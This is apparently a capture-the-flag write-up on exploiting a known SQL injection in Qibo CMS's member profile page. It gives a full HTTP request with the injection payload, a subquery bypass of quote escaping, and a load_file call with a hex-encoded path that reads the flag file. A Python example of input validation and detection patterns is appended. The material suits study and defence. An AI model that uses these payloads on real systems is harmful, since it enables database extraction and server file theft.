Goodbye CMS

  • A search showed that the site runs Qibo CMS.
  • Looking up known Qibo CMS vulnerabilities and checking which of the affected directories exist on the target, the SQL injection in /member/userinfo.php looked like it might work.
  • This link gives the detailed process: http://www.anquan.us/static/bugs/wooyun-2014-080259.html
  • Going to the end of that write-up, I built the payload in Burp Suite according to the vulnerability description:
POST /member/userinfo.php?job=edit&step=2 HTTP/1.1
Host: 1224ac9227f345b59cb0131a09721df592d05799f2094c85.changame.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://1224ac9227f345b59cb0131a09721df592d05799f2094c85.changame.ichunqiu.com/member/homepage.php?uid=3
Content-Type: application/x-www-form-urlencoded
Content-Length: 267
Connection: close
Cookie: USR=m56znlt5%0923%091559486775%09http%3A%2F%2F1224ac9227f345b59cb0131a09721df592d05799f2094c85.changame.ichunqiu.com%2Fmember%2Fhomepage.php%3Fuid%3D4; __jsluid=7d7f069fe967182647342ec73e505d82; passport=3%09admin1%09AwUEAFFQUQMBVwQGXlUBUV0DAA8OW1VVBQxUAgFaV1M%3D57f744ae5a
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

truename=xxxx%0000&Limitword[000]=&[email protected]&provinceid= , address=(select database() ) where uid = 3 %23 
  • Note that when constructing the payload, certain values have to be replaced with those of the account you registered yourself.
  • And finally it succeeded: the database name came out as blog.

  • Continuing to construct the SQL, I found that characters such as ' and " are filtered afterwards and get a \ prepended.
  • Since the first database name could already be dumped, the bypass is very simple.
  • Just replace the part after the = sign with a subquery. For example:
select group_concat(table_name)  from information_schema.tables where table_schema=(select table_schema from information_schema.tables group by table_schema limit 1,1  )
  • I went through it to the end and still found no flag. Finally, looking at the wp (write-up), the flag is obtained by using the SQL injection to read the file under /var/www/html.
  • That is, select load_file('/var/www/html/flag.php'), but since ' is filtered, the path is given in ASCII hex instead: select load_file(0x2f7661722f7777772f68746d6c2f666c61672e706870)
  • Because the file read out is a PHP file rather than an HTML file, it is not displayed on the page, so view the page source.
  • Got the flag.
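As an added example (not code from the write-up or from Qibo CMS), the two checks side by side in Python: a model of the quote-escaping filter described above, which passes the provinceid payload through untouched because it contains no quote to escape, beside a whitelist check that rejects anything non-numeric in a field the query uses unquoted, plus a log-side heuristic that flags the hex-literal load_file form. The field names, the sample body and the assumption that provinceid is an unquoted numeric column are constructed from the request shown above.

```python
import re
from urllib.parse import parse_qs

# Constructed sample body, modelled on the request in the write-up: the
# injected SQL rides in `provinceid`, assumed to be used unquoted as a number.
SAMPLE_BODY = ("truename=xxxx&provinceid= , address=(select database() ) "
               "where uid = 3 %23")
CLEAN_BODY = "truename=xxxx&provinceid=12"

# Fields assumed (not known) to be numeric in the CMS's UPDATE statement.
NUMERIC_FIELDS = ("provinceid", "uid")


def quote_escape_filter(value):
    """Models the filter the write-up ran into: ' " \\ and NUL get a backslash.
    It changes nothing in a payload that contains none of those characters."""
    return re.sub(r"(['\"\\\x00])", r"\\\1", value)


def is_clean_number(value):
    """Whitelist check: an unquoted numeric column may only receive digits."""
    return re.fullmatch(r"\d{1,10}", value.strip()) is not None


def looks_like_sql(value):
    """Log/WAF heuristic: SQL keywords, a comment terminator, or a long hex
    literal (the load_file(0x...) form used once quotes are escaped)."""
    pattern = r"(?i)\b(select|union|load_file)\b|#|--|0x[0-9a-f]{8,}"
    return re.search(pattern, value) is not None


def inspect_body(body):
    """Return {field: value} for every form parameter that fails validation."""
    rejected = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for v in values:
            if name in NUMERIC_FIELDS and not is_clean_number(v):
                rejected[name] = v
            elif looks_like_sql(v):
                rejected[name] = v
    return rejected


if __name__ == "__main__":
    payload = parse_qs(SAMPLE_BODY)["provinceid"][0]
    print(repr(quote_escape_filter(payload)))  # unchanged: nothing to escape
    print(inspect_body(SAMPLE_BODY))           # provinceid is rejected
    print(inspect_body(CLEAN_BODY))            # {}
```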

Reproduced from: https://www.jianshu.com/p/0ac84b411eb6

Origin blog.csdn.net/weixin_34357267/article/details/91214471